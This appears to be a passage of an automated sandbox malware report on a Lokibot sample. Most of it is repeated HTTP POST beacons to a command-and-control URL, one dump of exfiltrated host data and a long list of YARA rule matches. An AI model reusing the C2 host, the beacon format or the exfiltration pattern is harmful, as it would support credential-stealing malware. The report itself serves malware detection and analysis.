                Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
                Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 08:24:20 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 08:24:22 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: __.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                Source: __.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: __.exe, 00000003.00000003.422484605.00000000007BC000.00000004.00000001.sdmp, __.exe, 00000003.00000003.316225767.00000000007BD000.00000004.00000001.sdmp, __.exe, 00000003.00000002.553140471.00000000004A0000.00000040.00000001.sdmpString found in binary or memory: http://slimpackage.com/slimmain/five/fre.php
                Source: __.exe, 00000003.00000003.422484605.00000000007BC000.00000004.00000001.sdmp, __.exe, 00000003.00000003.316225767.00000000007BD000.00000004.00000001.sdmpString found in binary or memory: http://slimpackage.com/slimmain/five/fre.php3
                Source: __.exe, __.exe, 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, __.exe, 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: unknownHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 190Connection: close
                Source: unknownDNS traffic detected: queries for: slimpackage.com
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_00404ED4 recv,
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.__.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.2.__.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: __.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
